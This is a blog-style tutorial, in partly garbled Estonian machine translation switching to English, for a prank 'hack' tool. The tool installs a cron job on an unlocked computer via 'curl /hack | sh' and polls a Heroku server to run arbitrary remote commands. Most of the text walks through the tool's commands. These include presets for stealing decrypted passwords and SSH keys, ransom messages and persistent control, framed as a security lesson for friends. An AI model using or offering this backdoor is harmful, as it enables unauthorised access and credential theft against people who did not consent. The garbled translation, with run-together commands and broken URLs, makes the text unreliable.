Kuidas sõpru häkkida

Mu sõbrad jätavad oma arvuti sageli lahti ja lukustamata. Ma ütlen neile, et neil peaks olema harjumus arvuteid lukustada, kuid nad ei kuula mind. Nii et olen loonud lihtsa projekti, et häkkida oma sõpru ja näidata neile arvutiturbe tähtsust.

Mul on vaja vaid oodata, kuni nad mõneks sekundiks oma arvuti lukustamata jätavad, terminali avada ja sisestada ühe lühikese käsu.

See selleks! Nende arvuti on nüüd nakatunud ja ma saan selles arvutis eemalt käivitada mis tahes käske. Päris armas, eks? Või võib-olla šokeeriv?

Häkkimine on ebaseaduslik. Täpsemalt:

„Tahtlik juurdepääs arvutile ilma loata või volitamata juurdepääsu ületamine” - arvutipettuste ja väärkasutuse seadus (18 USC 1030)

Nii et pidage meeles, et selle artikli eesmärk on näidata teile, kui lihtne oleks halbade kavatsustega inimesel teid häkkida, et saaksite ise häkkimist vältida.

Teie elu hävitamiseks pole vaja mõnda häkkerite geeniust - iga „skriptipoiss”, kellel on teie arvutile füüsiline juurdepääs, võib teid ohustada, laadides alla skripti, mis sisaldab ainult 50 rida koodi.

Seadistamise alustamine

Kogu selle projekti kood elab selles hoidlas, kui soovite otse sisse hüpata, kuid ma selgitan allpool, kuidas see kõik töötab.

Esiteks peate lihtsalt repo kloonima, installima selle sõltuvused ja linkima tööriista Hack käsurealiidese (CLI).

git clone //github.com/ccorcos/hack.gitgit remote remove origincd hacknpm installnpm link

Järgmisena peate seadistama Heroku, et see võõrustaks teie sõprade masinas töötavaid skripte. Kui te pole kunagi varem Herokut kasutanud, registreeruge siin (see on tasuta!) Ja seadistage oma arvutisse nende CLI-tööriist.

brew install heroku-toolbeltheroku login

Nüüd sees hack repo, luua Heroku rakendust lihtne nimi meeles pidada. Kasutan häkker-chetti.

heroku create hacker-chet

Siis peate käivitama käsu, et teha väike seadistamine. Kõik, mida ta tegelikult teeb, on hankida oma Heroku veebisaidi juur-URL ja panna see paketti.json . Nii saab server süstida rakenduse URL-i shelliskriptidesse.

npm run init

Serveri saate käivitada kohapeal, kui soovite ennast häkkida ja asju proovida.

npm start

Või võite Herokusse juurutada.

npm run deploy

Nüüd olete valmis häkkima!

Hack API

Selle programmi ilu on see, et kellegi häkkimise alustamiseks peate lihtsalt tema masinas käivitama ühe käsu.

curl /hack | sh

ROOT_URL on teie rakenduse konkreetne tee. Kui kasutate serverit kohalikult, on see localhost: 5000 ja Herokule juurutamisel on see umbes .herokua pp.com.

See paneb paika croni töö - kronoloogilise töö, mis teatud ajahetkedel kordab ülesandeid - pingutama iga minut / env / live lõpp-punkti ja viima tulemuse sh-i . See on tegelikult üsna lihtne! Ja Heroku annab teile HTTPS-i tasuta, nii et see on "turvaline"?

Kui olete oma sõbra häkkinud, saate kõike muud teha oma arvutist käsurea tööriistaga.

Hack tööriist on mõiste erinevad häkkinud keskkondades. Kui häkkite kedagi / hacki lõpp-punkti abil, alustab see inimene elavas keskkonnas. Ja iga keskkonna jaoks saate käivitada erinevaid käske. Demonstreerin kõike väikese läbikäiguga.

Alljärgnev kirjutada live keskkonnas shell skript järgmine käsk, mis ütleb valjusti "Ma jälgin sind."

hack live exec "say 'I\'m watching you'"

Noh, see veel ei toimi, peate ikkagi oma Heroku rakendusse uuesti installima.

hack deploy

Oodake nüüd järgmist minutit ja vaadake, kuidas teie sõbra arvuti serverit pingutab, logides serveri logisid.

hack logs

Keskkondade mõte on nii, et saate korraga häkkida mitu inimest. Inimeste isoleerimiseks erinevates keskkondades peate lihtsalt nime muutma.

hack live rename jon

Järgmine kord, kui eluskeskkond pingitakse, kirjutab see croni töö ümber, et hakata selle asemel jon-i keskkonda pingutama .

Kõike samamoodi saate teha lihtsalt keskkonna argumenti muutes.

hack jon exec "say 'hello jon'"

Kui teil on selleks päevaks piisavalt lõbus olnud ja pidu on läbi, võite Joni unustada ja kinnitada talle, et olete ta "lahti häkkinud".

hack jon forget

See kustutab croni töö nende arvutist. Või võiksite selle keskkonna lihtsalt magamisrakkude režiimi viia, et saaksite selle hiljem taastada.

hack jon interval 1d

Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!

hack jon interval 1m

Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.

hack jon cron "0 6 * * * say 'good morning jon, remember what I told you about locking your computer?'"

P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.

* * * * *| | | | || | | | || | | | +---- Day of the Week (range: 1-7, 1 standing for Monday)| | | +------ Month of the Year (range: 1-12)| | +-------- Day of the Month (range: 1-31)| +---------- Hour (range: 0-23)+------------ Minute (range: 0-59)

One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.

hack jon preset desktop //i.imgur.com/5FC2r9R.jpg

And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.

hack jon dump "crontab -l"

Nüüd avage oma logid ja näete järgmise pingi väljundit. See on tegelikult palju kurjakuulutavam nüüd, kui saate teavet tagasi saada. Kui soovite olla alatu, võite otsida dekrüpteeritud paroole või varastada nende ssh-võtmeid.

hack jon preset passwordshack jon preset ssh

Aga kui soovite talle lihtsalt head vanaaegset hirmu tekitada, saatke talle lunastussõnum!

hack jon preset ransom "Hello Jon, I told you not to leave your computer unlocked."

Lõpuks, kui leiate, et lisate hulga croni töökohti ja soovite lihtsalt uuesti alustada, on siin abiks lähtestamine.

hack jon reset

Minge nüüd selle asjaga (vastutustundlikult) lõbutsema ja andke mulle teada, millised on teie lemmikud vembud, esitades uue käsu või eelseadistusega tõmbenõude!

Head häkkimist!